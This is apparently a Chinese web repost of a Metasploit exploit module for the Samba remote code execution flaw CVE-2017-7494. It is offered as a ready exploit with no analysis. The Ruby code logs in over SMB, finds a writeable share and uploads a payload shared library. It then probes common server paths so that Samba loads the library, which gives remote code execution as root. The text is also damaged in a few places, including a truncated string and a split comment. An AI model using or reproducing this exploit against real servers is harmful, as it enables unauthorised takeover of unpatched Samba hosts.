Samba远程代码执行漏洞(CVE-2017-7494)EXP

admin

1. ##
   
2. # This module requires Metasploit: http://metasploit.com/download
   
3. # Current source: https://github.com/rapid7/metasploit-framework
   
4. ##
   
5. 
   
6. class MetasploitModule < Msf::Exploit::Remote
   
7.   Rank = ExcellentRanking
   
8. 
   
9.   include Msf::Exploit::Remote::DCERPC
   
10.   include Msf::Exploit::Remote::SMB::Client
    
11. 
    
12.   def initialize(info = {})
    
13.     super(update_info(info,
    
14.       'Name'           => 'Samba is_known_pipename() Arbitrary Module Load',
    
15.       'Description'    => %q{
    
16.           This module triggers an arbitrary shared library load vulnerability
    
17.         in Samba versions 3.5.0 to 4.4.14, 4.5.10, and 4.6.4. This module
    
18.         requires valid credentials, a writeable folder in an accessible share,
    
19.         and knowledge of the server-side path of the writeable folder. In
    
20.         some cases, anonymous access combined with common filesystem locations
    
21.         can be used to automatically exploit this vulnerability.
    
22.       },
    
23.       'Author'         =>
    
24.         [
    
25.           'steelo <knownsteelo[at]gmail.com>',    # Vulnerability Discovery
    
26.           'hdm',                                  # Metasploit Module
    
27.         ],
    
28.       'License'        => MSF_LICENSE,
    
29.       'References'     =>
    
30.         [
    
31.           [ 'CVE', '2017-7494' ],
    
32.           [ 'URL', 'https://www.samba.org/samba/security/CVE-2017-7494.html' ],
    
33.         ],
    
34.       'Payload'         =>
    
35.         {
    
36.           'Space'       => 9000,
    
37.           'DisableNops' => true
    
38.         },
    
39.       'Platform'        => 'linux',
    
40.       #
    
41.       # Targets are currently limited by platforms with ELF-SO payload wrappers
    
42.       #
    
43.       'Targets'         =>
    
44.         [
    
45.           [ 'Linux ARM (LE)',   { 'Arch' => ARCH_ARMLE } ],
    
46.           [ 'Linux x86',        { 'Arch' => ARCH_X86 } ],
    
47.           [ 'Linux x86_64',     { 'Arch' => ARCH_X64 } ],
    
48.         # [ 'Linux MIPS',       { 'Arch' => MIPS } ],
    
49.         ],
    
50.       'Privileged'      => true,
    
51.       'DisclosureDate'  => 'Mar 24 2017',
    
52.       'DefaultTarget'   => 2))
    
53. 
    
54.     register_options(
    
55.       [
    
56.         OptString.new('SMB_SHARE_NAME', [false, 'The name of the SMB share containing a writeable directory']),
    
57.         OptString.new('SMB_SHARE_BASE', [false, 'The remote filesystem path correlating with the SMB share name']),
    
58.         OptString.new('SMB_FOLDER', [false, 'The directory to use within the writeable SMB share']),
    
59.       ])
    
60.   end
    
61. 
    
62. 
    
63.   def generate_common_locations
    
64.     candidates = []
    
65.     if datastore['SMB_SHARE_BASE'].to_s.length > 0
    
66.       candidates << datastore['SMB_SHARE_BASE']
    
67.     end
    
68. 
    
69.     %W{/volume1 /volume2 /volume3 /shared /mnt /mnt/usb /media /mnt/media /var/samba /tmp /home /home/shared}.each do |base_name|
    
70.       candidates << base_name
    
71.       candidates << [base_name, @share]
    
72.       candidates << [base_name, @share.downcase]
    
73.       candidates << [base_name, @share.upcase]
    
74.       candidates << [base_name, @share.capitalize]
    
75.       candidates << [base_name, @share.gsub(" ", "_")]
    
76.     end
    
77. 
    
78.     candidates.uniq
    
79.   end
    
80. 
    
81.   def enumerate_directories(share)
    
82.     begin
    
83.       self.simple.connect("\\\\#{rhost}\\#{share}")
    
84.       stuff = self.simple.client.find_first("\\*")
    
85.       directories = [""]
    
86.       stuff.each_pair do |entry,entry_attr|
    
87.         next if %W{. ..}.include?(entry)
    
88.         next unless entry_attr['type'] == 'D'
    
89.         directories << entry
    
90.       end
    
91. 
    
92.       return directories
    
93. 
    
94.     rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
    
95.       vprint_error("Enum #{share}: #{e}")
    
96.       return nil
    
97. 
    
98.     ensure
    
99.       if self.simple.shares["\\\\#{rhost}\\#{share}"]
    
100.         self.simple.disconnect("\\\\#{rhost}\\#{share}")
     
101.       end
     
102.     end
     
103.   end
     
104. 
     
105.   def verify_writeable_directory(share, directory="")
     
106.     begin
     
107.       self.simple.connect("\\\\#{rhost}\\#{share}")
     
108. 
     
109.       random_filename = Rex::Text.rand_text_alpha(5)+".txt"
     
110.       filename = directory.length == 0 ? "\\#{random_filename}" : "\\#{directory}\\#{random_filename}"
     
111. 
     
112.       wfd = simple.open(filename, 'rwct')
     
113.       wfd << Rex::Text.rand_text_alpha(8)
     
114.       wfd.close
     
115. 
     
116.       simple.delete(filename)
     
117.       return true
     
118. 
     
119.     rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
     
120.       vprint_error("Write #{share}#{filename}: #{e}")
     
121.       return false
     
122. 
     
123.     ensure
     
124.       if self.simple.shares["\\\\#{rhost}\\#{share}"]
     
125.         self.simple.disconnect("\\\\#{rhost}\\#{share}")
     
126.       end
     
127.     end
     
128.   end
     
129. 
     
130.   def share_type(val)
     
131.     [ 'DISK', 'PRINTER', 'DEVICE', 'IPC', 'SPECIAL', 'TEMPORARY' ][val]
     
132.   end
     
133. 
     
134.   def enumerate_shares_lanman
     
135.     shares = []
     
136.     begin
     
137.       res = self.simple.client.trans(
     
138.         "\\PIPE\\LANMAN",
     
139.         (
     
140.           [0x00].pack('v') +
     
141.           "WrLeh\x00"   +
     
142.           "B13BWz\x00"  +
     
143.           [0x01, 65406].pack("vv")
     
144.         ))
     
145.     rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
     
146.       vprint_error("Could not enumerate shares via LANMAN")
     
147.       return []
     
148.     end
     
149.     if res.nil?
     
150.       vprint_error("Could not enumerate shares via LANMAN")
     
151.       return []
     
152.     end
     
153. 
     
154.     lerror, lconv, lentries, lcount = res['Payload'].to_s[
     
155.       res['Payload'].v['ParamOffset'],
     
156.       res['Payload'].v['ParamCount']
     
157.     ].unpack("v4")
     
158. 
     
159.     data = res['Payload'].to_s[
     
160.       res['Payload'].v['DataOffset'],
     
161.       res['Payload'].v['DataCount']
     
162.     ]
     
163. 
     
164.     0.upto(lentries - 1) do |i|
     
165.       sname,tmp = data[(i * 20) +  0, 14].split("\x00")
     
166.       stype     = data[(i * 20) + 14, 2].unpack('v')[0]
     
167.       scoff     = data[(i * 20) + 16, 2].unpack('v')[0]
     
168.       scoff -= lconv if lconv != 0
     
169.       scomm,tmp = data[scoff, data.length - scoff].split("\x00")
     
170.       shares << [ sname, share_type(stype), scomm]
     
171.     end
     
172. 
     
173.     shares
     
174.   end
     
175. 
     
176.   def probe_module_path(path)
     
177.     begin
     
178.       simple.create_pipe(path)
     
179.     rescue Rex::Proto::SMB::Exceptions::ErrorCode => e
     
180.       vprint_error("Probe: #{path}: #{e}")
     
181.     end
     
182.   end
     
183. 
     
184.   def find_writeable_path(share)
     
185.     subdirs = enumerate_directories(share)
     
186.     return unless subdirs
     
187. 
     
188.     if datastore['SMB_FOLDER'].to_s.length > 0
     
189.       subdirs.unshift(datastore['SMB_FOLDER'])
     
190.     end
     
191. 
     
192.     subdirs.each do |subdir|
     
193.       next unless verify_writeable_directory(share, subdir)
     
194.       return subdir
     
195.     end
     
196. 
     
197.     nil
     
198.   end
     
199. 
     
200.   def find_writeable_share_path
     
201.     @path = nil
     
202.     share_info = enumerate_shares_lanman
     
203.     if datastore['SMB_SHARE_NAME'].to_s.length > 0
     
204.       share_info.unshift [datastore['SMB_SHARE_NAME'], 'DISK', '']
     
205.     end
     
206. 
     
207.     share_info.each do |share|
     
208.       next if share.first.upcase == 'IPC
     
209. 
     
210. 
     
211.       found = find_writeable_path(share.first)
     
212.       next unless found
     
213.       @share = share.first
     
214.       @path  = found
     
215.       break
     
216.     end
     
217.   end
     
218. 
     
219.   def find_writeable
     
220.     find_writeable_share_path
     
221.     unless @share && @path
     
222.       print_error("No suiteable share and path were found, try setting SMB_SHARE_NAME and SMB_FOLDER")
     
223.       fail_with(Failure::NoTarget, "No matching target")
     
224.     end
     
225.     print_status("Using location \\\\#{rhost}\\#{@share}\\#{@path} for the path")
     
226.   end
     
227. 
     
228.   def upload_payload
     
229.     begin
     
230.       self.simple.connect("\\\\#{rhost}\\#{@share}")
     
231. 
     
232.       random_filename = Rex::Text.rand_text_alpha(8)+".so"
     
233.       filename = @path.length == 0 ? "\\#{random_filename}" : "\\#{@path}\\#{random_filename}"
     
234.       wfd = simple.open(filename, 'rwct')
     
235.       wfd << Msf::Util::EXE.to_executable_fmt(framework, target.arch, target.platform,
     
236.         payload.encoded, "elf-so", {:arch => target.arch, :platform => target.platform}
     
237.       )
     
238.       wfd.close
     
239. 
     
240.       @payload_name = random_filename
     
241.       return true
     
242. 
     
243.     rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
     
244.       print_error("Write #{@share}#{filename}: #{e}")
     
245.       return false
     
246. 
     
247.     ensure
     
248.       if self.simple.shares["\\\\#{rhost}\\#{@share}"]
     
249.         self.simple.disconnect("\\\\#{rhost}\\#{@share}")
     
250.       end
     
251.     end
     
252.   end
     
253. 
     
254.   def find_payload
     
255.     print_status("Payload is stored in //#{rhost}/#{@share}/#{@path} as #{@payload_name}")
     
256. 
     
257.     # Reconnect to IPC$
     
258.     simple.connect("\\\\#{rhost}\\IPC$")
     
259. 
     
260.     #
     
261.     # In a perfect world we would find a way make IPC
     
262. 
     
263. s associated CWD
     
264.     # change to our share path, which would allow the following code:
     
265.     #
     
266.     # probe_module_path("/proc/self/cwd/#{@path}/#{@payload_name}")
     
267.     #
     
268. 
     
269.     # Until we find a better way, brute force based on common paths
     
270.     generate_common_locations.each do |location|
     
271.       target = [location, @path, @payload_name].join("/").gsub(/\/+/, '/')
     
272.       print_status("Trying location #{target}...")
     
273.       probe_module_path(target)
     
274.     end
     
275.   end
     
276. 
     
277.   def exploit
     
278.     # Setup SMB
     
279.     connect
     
280.     smb_login
     
281. 
     
282.     # Find a writeable share
     
283.     find_writeable
     
284. 
     
285.     # Upload the shared library payload
     
286.     upload_payload
     
287. 
     
288.     # Find and execute the payload from the share
     
289.     find_payload rescue Rex::StreamClosedError
     
290. 
     
291.     # Shutdown
     
292.     disconnect
     
293.   end
     
294. 
     
295. end

复制代码